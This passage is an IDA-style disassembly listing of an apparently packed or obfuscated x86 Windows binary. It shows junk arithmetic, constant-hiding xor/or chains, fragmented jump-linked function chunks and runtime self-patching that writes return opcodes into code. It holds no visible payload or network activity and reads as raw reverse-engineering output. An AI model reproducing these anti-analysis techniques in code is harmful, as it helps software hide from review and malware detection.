		jnz	loc_44C9E1
		jmp	sub_446ED4
; ---------------------------------------------------------------------------
		sbb	edx, 2CDB896Ah
		jmp	loc_4418BA
; ---------------------------------------------------------------------------

loc_44B30D:				; CODE XREF: hvvrg7ie:0043EF77j
		xchg	esi, edi
		add	eax, 73C1D13Dh
		push	959D6830h
		mov	edi, 75B9A2ADh
		pushf
		jmp	loc_44D509
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4396C7

loc_44B325:				; CODE XREF: sub_4396C7:loc_458D81j
		mov	eax, 1C5E06BAh
		push	eax
		push	offset sub_455F5D
		jmp	loc_4582DE
; END OF FUNCTION CHUNK	FOR sub_4396C7
; ---------------------------------------------------------------------------

loc_44B335:				; CODE XREF: hvvrg7ie:0044D5E6j
		xchg	eax, [edx]

loc_44B337:				; CODE XREF: hvvrg7ie:loc_44D5D2j
		xor	edx, 0BAF5831Bh
		or	edx, 14DEF215h
		add	edx, 2A657D0Bh
		mov	edx, [edx]
		or	edx, edx
		jnz	loc_447B4E
		jmp	loc_451102
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44680C

loc_44B358:				; CODE XREF: sub_44680C+14E02j
		and	ebx, 0D37FC5B5h
		add	ebx, 701B4CB8h
		mov	[ebx], eax
		pop	ebx
		push	offset sub_45B914
		jmp	sub_451FAD
; END OF FUNCTION CHUNK	FOR sub_44680C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440643

loc_44B371:				; CODE XREF: sub_440643:loc_4488EBj
					; hvvrg7ie:00448902j
		add	ebx, 51903A13h
		call	sub_457269
; END OF FUNCTION CHUNK	FOR sub_440643
; START	OF FUNCTION CHUNK FOR sub_4512A0

loc_44B37C:				; CODE XREF: sub_4512A0:loc_454FF7j
		jmp	loc_449BCF
; END OF FUNCTION CHUNK	FOR sub_4512A0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440402

loc_44B381:				; CODE XREF: sub_440402+F7ADj
		jmp	nullsub_378
; END OF FUNCTION CHUNK	FOR sub_440402
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CD0B

loc_44B386:				; CODE XREF: sub_43CD0B+46B1j
		jmp	loc_44201E
; END OF FUNCTION CHUNK	FOR sub_43CD0B
; ---------------------------------------------------------------------------

loc_44B38B:				; CODE XREF: hvvrg7ie:0045A3E9j
		pop	ebp
		jb	loc_45055D
		mov	eax, [esp]
		push	edx
		call	sub_45329F
		jmp	loc_45AE0E
; ---------------------------------------------------------------------------
		mov	ds:off_41D124, eax
		lea	eax, loc_44E39C
		mov	byte ptr [eax],	0C3h
		jmp	loc_44E39C
; ---------------------------------------------------------------------------
		call	sub_4480DC
		pushf
		jmp	sub_44F4D4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443375

loc_44B3BF:				; CODE XREF: sub_443375:loc_43D639j
		jz	loc_43A218
		jmp	loc_446D12
; END OF FUNCTION CHUNK	FOR sub_443375
; ---------------------------------------------------------------------------

loc_44B3CA:				; CODE XREF: hvvrg7ie:004562C7j
		jbe	loc_446250

; =============== S U B	R O U T	I N E =======================================



sub_44B3D0	proc near		; CODE XREF: sub_43FC15+9E1p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 004591FE SIZE 00000021 BYTES

		xchg	edx, [esp+0]
		pop	edx
		xchg	eax, [esp-4+arg_0]
		push	dword ptr [ebp+0Ch]
		push	dword ptr [ebp+8]

loc_44B3DD:				; CODE XREF: hvvrg7ie:loc_4400E8j
		call	eax
		push	esi
		jmp	loc_4591FE
sub_44B3D0	endp


; =============== S U B	R O U T	I N E =======================================



sub_44B3E5	proc near		; CODE XREF: sub_43D3B5-1812p
					; hvvrg7ie:0044CEC3j

; FUNCTION CHUNK AT 0044E7BB SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		mov	byte ptr [eax],	0C3h
		jmp	loc_44E7BB
sub_44B3E5	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_44B3F1	proc near		; CODE XREF: sub_403900+9p
					; sub_40B439+35p
					; DATA XREF: ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043C9B5 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044296F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443B40 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00445FFE SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044A5BA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B205 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044B90B SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0044C062 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E039 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044E299 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045496E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458DC7 SIZE 00000005 BYTES

		js	loc_443B40
		push	0AB0B6453h
		jmp	loc_44296F
sub_44B3F1	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EB47

loc_44B401:				; CODE XREF: sub_43EB47+13F27j
		jnz	loc_441C00
		jmp	loc_44BF79
; END OF FUNCTION CHUNK	FOR sub_43EB47
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453E08

loc_44B40C:				; CODE XREF: sub_453E08+7449j
		lea	eax, nullsub_8
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_8
; END OF FUNCTION CHUNK	FOR sub_453E08
; ---------------------------------------------------------------------------
		call	nullsub_12
		jmp	ds:dword_41D17C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_12. PRESS	KEYPAD "+" TO EXPAND]
		dw 6C85h
		db 67h,	2 dup(0FFh)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D47E

loc_44B42B:				; CODE XREF: sub_43D47E-23BCj
		jmp	loc_454697
; END OF FUNCTION CHUNK	FOR sub_43D47E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445B46

loc_44B430:				; CODE XREF: sub_445B46:loc_45B5F0j
		pop	eax
		or	eax, 613851D0h
		add	eax, 0AF56F324h
		or	eax, 2CED8FC1h
		xor	eax, 91483B49h
		push	offset sub_453CA3
		jmp	nullsub_468
; END OF FUNCTION CHUNK	FOR sub_445B46
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FC15

loc_44B453:				; CODE XREF: sub_43FC15+21C3j
		sub	al, 99h
		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_459DEA
		jmp	loc_458104
; END OF FUNCTION CHUNK	FOR sub_43FC15
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45889B

loc_44B467:				; CODE XREF: sub_45889B:loc_4438BAj
		mov	[ebp-18h], eax
		push	offset sub_44AB4C
		jmp	nullsub_327
; END OF FUNCTION CHUNK	FOR sub_45889B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4521D4

loc_44B474:				; CODE XREF: sub_4521D4:loc_4521E3j
		adc	ebx, ebp
		shr	edi, 7
		adc	eax, 9C63AD3Fh
		jmp	loc_4565DF
; END OF FUNCTION CHUNK	FOR sub_4521D4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F4AE

loc_44B484:				; CODE XREF: sub_44F4AE+Dj
		mov	edx, [esp+0]
		push	eax
		mov	eax, edx
		call	sub_449EB1
		push	offset loc_446CE1
		jmp	nullsub_113
; END OF FUNCTION CHUNK	FOR sub_44F4AE
; ---------------------------------------------------------------------------
		jbe	loc_45318B
		sbb	eax, edx
		cmp	ecx, 379D0111h
		jmp	loc_459AE3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446D8D

loc_44B4AC:				; CODE XREF: sub_446D8D:loc_45574Cj
		mov	edx, eax
		push	ebx
		push	0D47EDAECh
		pop	ebx
		or	ebx, 71C065C2h
		and	ebx, 0DD96E6ACh
		rol	ebx, 9
		jmp	loc_441875
; END OF FUNCTION CHUNK	FOR sub_446D8D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_340. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_44B4CA	proc near		; CODE XREF: hvvrg7ie:0044D265p
					; hvvrg7ie:004560F7j

; FUNCTION CHUNK AT 0043BF19 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BA83 SIZE 00000008 BYTES

		xchg	eax, [esp+0]
		pop	eax
		mov	ds:dword_41D19C, eax
		lea	eax, nullsub_507
		jmp	loc_43BF19
sub_44B4CA	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_211. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449CB1

loc_44B4E0:				; CODE XREF: sub_449CB1+6j
		jmp	loc_444E58
; END OF FUNCTION CHUNK	FOR sub_449CB1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4471CA

loc_44B4E5:				; CODE XREF: sub_4471CA-B32Bj
		jmp	sub_45046B
; END OF FUNCTION CHUNK	FOR sub_4471CA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B7CB

loc_44B4EA:				; CODE XREF: sub_44B7CB:loc_45984Dj
					; sub_451669:loc_459AD3j
		jnb	loc_448DFC
		jmp	loc_4530A0
; END OF FUNCTION CHUNK	FOR sub_44B7CB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E063

loc_44B4F5:				; CODE XREF: sub_43E063+10j
		and	eax, 7
		mov	[ebp-0Ch], eax

loc_44B4FB:				; CODE XREF: sub_444BE1:loc_44B6C0j
		cmp	dword ptr [ebp-10h], 0
		jnz	loc_44108A
		cmp	dword ptr [ebp-0Ch], 5
		jnz	loc_44108A
		push	offset sub_441083
		jmp	loc_45B90A
; END OF FUNCTION CHUNK	FOR sub_43E063
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_459. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458175

loc_44B51A:				; CODE XREF: sub_458175-651Cj
		jmp	nullsub_303
; END OF FUNCTION CHUNK	FOR sub_458175
; ---------------------------------------------------------------------------

loc_44B51F:				; CODE XREF: hvvrg7ie:004398A5j
		jmp	loc_455C77

; =============== S U B	R O U T	I N E =======================================



sub_44B524	proc near		; CODE XREF: sub_43E063-4F61p
					; hvvrg7ie:004590BBj

; FUNCTION CHUNK AT 00440CE8 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 004463AD SIZE 00000010 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		jnz	loc_4463AD

loc_44B52E:				; CODE XREF: sub_43E063:loc_44409Bj
					; sub_43E063+604Ej ...
		push	offset loc_450C18
		jmp	nullsub_87
sub_44B524	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_44B539:				; CODE XREF: sub_43F227+DAF4j
		jmp	loc_4410AA
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D30A

loc_44B53E:				; CODE XREF: sub_43D30A+15B0j
		jmp	loc_43CB4C
; END OF FUNCTION CHUNK	FOR sub_43D30A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43AB99

loc_44B543:				; CODE XREF: sub_43AB99:loc_459315j
		sub	eax, 0F873FF58h
		ror	eax, 3
		push	esi
		push	0BAFAE5F4h
		pop	esi
		rol	esi, 1Bh
		cmp	esi, 90B46BAFh
		jmp	loc_44C334
; END OF FUNCTION CHUNK	FOR sub_43AB99
; ---------------------------------------------------------------------------

loc_44B561:				; CODE XREF: hvvrg7ie:0044B980j
		add	ebx, 0CE4E42D6h

loc_44B567:				; CODE XREF: hvvrg7ie:loc_44B96Bj
		xor	eax, 73EDF439h
		and	eax, 0FBC02346h
		add	eax, 0EFFFDFBEh
		push	offset loc_43A776
		jmp	locret_43FD73
; ---------------------------------------------------------------------------

loc_44B583:				; CODE XREF: hvvrg7ie:0043C39Dj
		push	eax
		push	58DCC075h
		pop	edx
; START	OF FUNCTION CHUNK FOR sub_442FD1

loc_44B58A:				; CODE XREF: sub_442FD1+176FEj
		add	edx, 778B40E2h
		jmp	loc_44FDA2
; END OF FUNCTION CHUNK	FOR sub_442FD1

; =============== S U B	R O U T	I N E =======================================



sub_44B595	proc near		; CODE XREF: hvvrg7ie:0044E238j
					; sub_456B75+1p
		xchg	ecx, [esp+0]
		pop	ecx
		mov	ebp, esp
		push	ebx
		mov	ebx, ecx
		jmp	loc_4478F9
sub_44B595	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447E20

loc_44B5A3:				; CODE XREF: sub_447E20:loc_454775j
		inc	eax
		mov	[ebp-1Ch], eax
		mov	dword ptr [ebp-18h], 0
; END OF FUNCTION CHUNK	FOR sub_447E20
; START	OF FUNCTION CHUNK FOR sub_43EBB6

loc_44B5AE:				; CODE XREF: sub_43EBB6+C5DFj
		mov	eax, [ebp-4]
		mov	edx, [ebp-14h]
		add	eax, [edx+20h]
		xor	edx, edx
		jmp	loc_459742
; END OF FUNCTION CHUNK	FOR sub_43EBB6
; ---------------------------------------------------------------------------

loc_44B5BE:				; CODE XREF: hvvrg7ie:004531AAj
		add	eax, 5DEA39FDh
		jmp	loc_45AA14
; ---------------------------------------------------------------------------

loc_44B5C9:				; CODE XREF: hvvrg7ie:0044274Fj
		jle	loc_445AF8
		add	ebp, 0BA3D7B31h
		jb	loc_458B5F
; START	OF FUNCTION CHUNK FOR sub_452B83

loc_44B5DB:				; CODE XREF: sub_452B83-1044Dj
		and	edi, 5A236BBBh
		add	edi, 0AE1F6567h
		mov	[edi], eax
		pop	edi
		jmp	loc_4426AF
; END OF FUNCTION CHUNK	FOR sub_452B83
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450246

loc_44B5EF:				; CODE XREF: sub_450246-956Aj
		cmp	dword ptr [ebp-20h], 0
		jge	loc_4564BA
		jmp	loc_446261
; END OF FUNCTION CHUNK	FOR sub_450246
; ---------------------------------------------------------------------------
		mov	edx, 0DD960900h
		push	eax
		push	0F5DEAAFFh
		pop	eax
		jmp	loc_454420
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F6DB

loc_44B60F:				; CODE XREF: sub_43F6DB+16BBCj
		mov	[ebp-9], al
		mov	al, [ebp-0Ah]
		call	sub_44C8AA

locret_44B61A:				; CODE XREF: sub_44CE90-2674j
		retn
; END OF FUNCTION CHUNK	FOR sub_43F6DB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445F5B

loc_44B61B:				; CODE XREF: sub_445F5B-B265j
		jmp	loc_43D504
; END OF FUNCTION CHUNK	FOR sub_445F5B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B888

loc_44B620:				; CODE XREF: hvvrg7ie:0044E674j
					; sub_45B888+10j
		rol	eax, 4
		add	eax, 0E198D81h
		xchg	eax, [esp+0]
		jmp	sub_44C072
; END OF FUNCTION CHUNK	FOR sub_45B888
; ---------------------------------------------------------------------------

loc_44B631:				; DATA XREF: sub_43EE33-5DF8o
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0E8h
		jnz	loc_43E138
		mov	eax, [ebp-4]
		inc	eax
		mov	eax, [eax]
		jmp	loc_447419
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EE33

loc_44B648:				; CODE XREF: sub_43EE33:loc_43EE47j
		mov	eax, [ebp-4]
		jmp	loc_446EA7
; END OF FUNCTION CHUNK	FOR sub_43EE33
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456881

loc_44B650:				; CODE XREF: sub_456881:loc_456895j
		push	ds:dword_44EE2C
		retn
; END OF FUNCTION CHUNK	FOR sub_456881
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_44B657:				; CODE XREF: sub_44D2F8-3305j
		jmp	loc_453C7F
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------

loc_44B65C:				; CODE XREF: hvvrg7ie:004488CBj
		jmp	loc_44E1A9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446D8D

loc_44B661:				; CODE XREF: sub_446D8D-188Bj
		jmp	loc_4450BD
; END OF FUNCTION CHUNK	FOR sub_446D8D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449007

loc_44B666:				; CODE XREF: sub_449007j
		call	sub_459A95

loc_44B66B:				; CODE XREF: sub_449E02-745Dj
		or	esi, 70661D91h
		jnz	loc_43DAE1

loc_44B677:				; CODE XREF: hvvrg7ie:0044CCC7j
		jmp	loc_44A41D
; END OF FUNCTION CHUNK	FOR sub_449007
; ---------------------------------------------------------------------------
		and	esi, 0B843BD80h
		adc	eax, edx
		test	esi, ecx
		jmp	loc_43DAD3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B395

loc_44B68B:				; CODE XREF: sub_45B395+2j
		rol	eax, 0Fh
; END OF FUNCTION CHUNK	FOR sub_45B395
; START	OF FUNCTION CHUNK FOR sub_44F8F2

loc_44B68E:				; CODE XREF: sub_44F8F2:loc_43E892j
		push	eax
		retn
; END OF FUNCTION CHUNK	FOR sub_44F8F2
; ---------------------------------------------------------------------------

loc_44B690:				; CODE XREF: hvvrg7ie:0045B8FBj
		jmp	loc_4432C8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44531A

loc_44B695:				; CODE XREF: sub_44531A+Cj
		jmp	loc_44793F
; END OF FUNCTION CHUNK	FOR sub_44531A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454463

loc_44B69A:				; CODE XREF: sub_454463-18F64j
		jmp	loc_45628E
; END OF FUNCTION CHUNK	FOR sub_454463

; =============== S U B	R O U T	I N E =======================================



sub_44B69F	proc near		; CODE XREF: sub_45A4C9-1B455j
					; sub_43EE33+1857j ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043F985 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004423C6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E962 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044FF4F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00450D3F SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00451FE5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456D55 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458411 SIZE 0000002D BYTES

		push	ebp
		call	sub_43B35B

loc_44B6A5:				; CODE XREF: sub_4408FA+4880j
		jmp	loc_44FF4F
sub_44B69F	endp

; ---------------------------------------------------------------------------

locret_44B6AA:				; CODE XREF: hvvrg7ie:loc_446616j
		retn
; ---------------------------------------------------------------------------

loc_44B6AB:				; CODE XREF: hvvrg7ie:0044E8ABj
		jmp	loc_44820C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449924

loc_44B6B0:				; CODE XREF: sub_449924+7j
		jmp	sub_43E7F3
; END OF FUNCTION CHUNK	FOR sub_449924
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C811

loc_44B6B5:				; CODE XREF: sub_43C811:loc_44C7FCj
		jnz	loc_4529BE
		jmp	loc_452368
; END OF FUNCTION CHUNK	FOR sub_43C811
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444BE1

loc_44B6C0:				; CODE XREF: sub_444BE1+200Fj
		jnb	loc_44B4FB

loc_44B6C6:				; CODE XREF: sub_444BE1:loc_45938Cj
		push	edx
		push	0FAF02D0Ah
		pop	edx
		sub	edx, 7F27C3B6h
		jmp	loc_453912
; END OF FUNCTION CHUNK	FOR sub_444BE1
; ---------------------------------------------------------------------------
		sbb	esi, 0D9AE582Ch
		jmp	loc_458F79
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_44B6E3:				; CODE XREF: sub_43F227+67DFj
		jnz	loc_44930B
		jmp	loc_4538C2
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------

loc_44B6EE:				; CODE XREF: hvvrg7ie:004577ECj
		add	edi, 6FA84416h
		sbb	ebp, eax
		pushf

loc_44B6F7:				; CODE XREF: hvvrg7ie:loc_4577DBj
		add	eax, 24C912BCh
		push	offset loc_445A80
		jmp	locret_4457BA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B2AC

loc_44B707:				; CODE XREF: sub_45B2AC:loc_440D53j
		test	edx, 40h
		jmp	loc_458E9E
; END OF FUNCTION CHUNK	FOR sub_45B2AC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_72. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44B713:				; CODE XREF: hvvrg7ie:0043ADA8j
		push	offset sub_43F13A
		jmp	loc_45826B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451BAD

loc_44B71D:				; CODE XREF: sub_451BAD+10j
		add	eax, 5D8A751Bh
		jnz	loc_44CDA1
; END OF FUNCTION CHUNK	FOR sub_451BAD
; START	OF FUNCTION CHUNK FOR sub_43A564

loc_44B729:				; CODE XREF: sub_43A564+Dj
		jmp	loc_45A4AF
; END OF FUNCTION CHUNK	FOR sub_43A564
; ---------------------------------------------------------------------------
		dw 8A0Fh
		dd 236Fh, 0FF9DCEE9h
		db 0FFh
; ---------------------------------------------------------------------------

loc_44B739:				; CODE XREF: hvvrg7ie:loc_43AC66j
		mov	ecx, eax
		xchg	ecx, [esp]
		call	sub_44C072
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_44B743:				; CODE XREF: sub_452265-B4ECj
					; sub_43D285+16EB3j ...
		jno	loc_456C71
		call	sub_439549
		test	al, al
		jmp	loc_45641D
; END OF FUNCTION CHUNK	FOR sub_43D285
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_178. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444BE1

loc_44B756:				; CODE XREF: sub_444BE1:loc_4451B7j
		neg	eax
		mov	[ebp-5], al

loc_44B75B:				; CODE XREF: hvvrg7ie:loc_4438BFj
		jnb	loc_44766A
		cmp	byte ptr [ebp-5], 0
		jnz	loc_44A3DE
		jmp	loc_43F855
; END OF FUNCTION CHUNK	FOR sub_444BE1
; ---------------------------------------------------------------------------

loc_44B770:				; CODE XREF: hvvrg7ie:0043AD96j
		js	loc_4432EB
		cmp	edx, eax
		jmp	loc_446638
; ---------------------------------------------------------------------------

loc_44B77D:				; CODE XREF: hvvrg7ie:0043DD47j
		jbe	loc_451FEA
		xor	ecx, ebx

loc_44B785:				; CODE XREF: hvvrg7ie:0043904Fj
		jmp	sub_45697F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43A625

loc_44B78A:				; CODE XREF: sub_43A625:loc_43B4C1j
		mov	ebp, ecx
		pop	ecx
		jmp	loc_44C067
; END OF FUNCTION CHUNK	FOR sub_43A625
; ---------------------------------------------------------------------------

loc_44B792:				; CODE XREF: hvvrg7ie:loc_44D399j
		and	eax, 0AA2E6908h
		add	ebx, 54DD9967h
		push	6F9AFF46h
		pop	edx
		jmp	loc_453F64
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44370F

loc_44B7A9:				; CODE XREF: sub_44370F:loc_44BD57j
		cdq
		or	eax, ebx
		jmp	loc_454F0C
; END OF FUNCTION CHUNK	FOR sub_44370F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_260. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4404E7

loc_44B7B2:				; CODE XREF: sub_4404E7+190A0j
		jmp	loc_458150
; END OF FUNCTION CHUNK	FOR sub_4404E7
; ---------------------------------------------------------------------------

loc_44B7B7:				; CODE XREF: hvvrg7ie:00455BC6j
		jmp	loc_44D83E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E063

loc_44B7BC:				; CODE XREF: sub_43E063+108FAj
		sbb	eax, ebp
		adc	ecx, 7A6BFC57h
		sbb	edi, esi
		jmp	loc_455F9E
; END OF FUNCTION CHUNK	FOR sub_43E063

; =============== S U B	R O U T	I N E =======================================



sub_44B7CB	proc near		; DATA XREF: sub_452B83:loc_450876o

; FUNCTION CHUNK AT 0043AFB1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043CD62 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00440850 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00446C46 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044827C SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00449015 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044B4EA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044EB7E SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004520F1 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00452909 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004530A0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00454C59 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459091 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045984D SIZE 00000016 BYTES

		xor	eax, 0CC54F5A2h
		popf
		shl	eax, cl
		mov	edx, [ebp-18h]
		shr	edx, 3
		jmp	loc_446C46
sub_44B7CB	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		jmp	ds:off_41D090
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BEBB

loc_44B7E5:				; CODE XREF: sub_44BEBB+Cj
		jmp	loc_4476E3
; END OF FUNCTION CHUNK	FOR sub_44BEBB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440B7A

loc_44B7EA:				; CODE XREF: hvvrg7ie:00444858j
					; hvvrg7ie:loc_449E3Cj	...
		pop	edx
		call	sub_45A003
; END OF FUNCTION CHUNK	FOR sub_440B7A
; START	OF FUNCTION CHUNK FOR sub_43AB99

loc_44B7F0:				; CODE XREF: sub_43AB99:loc_4483A1j
		add	edx, 9D0FB3D6h
		mov	[edx], eax
		pop	edx
		xchg	edi, [esp+0]
		jmp	loc_43FF53
; END OF FUNCTION CHUNK	FOR sub_43AB99
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A2CE

loc_44B801:				; CODE XREF: sub_45A2CE-20535j
		mov	eax, [esp+0]
		push	edi
		mov	edi, edx
		xchg	edi, [esp+4+var_4]
		call	sub_4489AE
		mov	eax, 0D4280129h
		call	sub_44059F
		mov	ds:off_41D038, eax
		jmp	loc_43D55B
; END OF FUNCTION CHUNK	FOR sub_45A2CE
; ---------------------------------------------------------------------------

loc_44B824:				; CODE XREF: hvvrg7ie:0044D3B5j
		pop	ebx
		and	ebx, 3E50582Bh
		sub	ebx, 73018480h
; START	OF FUNCTION CHUNK FOR sub_44398A

loc_44B831:				; CODE XREF: sub_44398A:loc_45AC39j
		add	ebx, 0F3E1BF5Ch
		jmp	loc_43CF9F
; END OF FUNCTION CHUNK	FOR sub_44398A
; ---------------------------------------------------------------------------

loc_44B83C:				; CODE XREF: hvvrg7ie:0043C582j
		jz	loc_454813
		adc	ebx, 213C3396h
		jmp	loc_453D52
; ---------------------------------------------------------------------------

loc_44B84D:				; CODE XREF: hvvrg7ie:0044995Aj
		rol	edi, 13h
		sbb	eax, edi
		ror	ebx, 1Fh
; START	OF FUNCTION CHUNK FOR sub_445BE8

loc_44B855:				; CODE XREF: sub_445BE8:loc_44994Dj
		add	ecx, 0E2E8944Ch
		mov	ecx, [ecx]
		call	sub_450FF2
; END OF FUNCTION CHUNK	FOR sub_445BE8
; START	OF FUNCTION CHUNK FOR sub_43FC15

loc_44B862:				; CODE XREF: sub_43FC15+3j
		jmp	loc_441DC2
; END OF FUNCTION CHUNK	FOR sub_43FC15
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B9BB

loc_44B867:				; CODE XREF: sub_45B9BB-1F159j
		or	edx, 0E9597D1Eh
		xor	edx, 718C6036h
		js	loc_459CF4
; END OF FUNCTION CHUNK	FOR sub_45B9BB
; START	OF FUNCTION CHUNK FOR sub_449007

loc_44B879:				; CODE XREF: sub_449007-3667j
		jmp	sub_43E7F3
; END OF FUNCTION CHUNK	FOR sub_449007
; ---------------------------------------------------------------------------
		jg	loc_4508CC
		shl	eax, 15h
		push	edi
		jmp	loc_459CED
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_149. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446B4C

loc_44B88E:				; CODE XREF: sub_446B4C+122E8j
		jmp	loc_43D208
; END OF FUNCTION CHUNK	FOR sub_446B4C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E128

loc_44B893:				; CODE XREF: sub_43E128+163DAj
		jmp	loc_449FAE
; END OF FUNCTION CHUNK	FOR sub_43E128
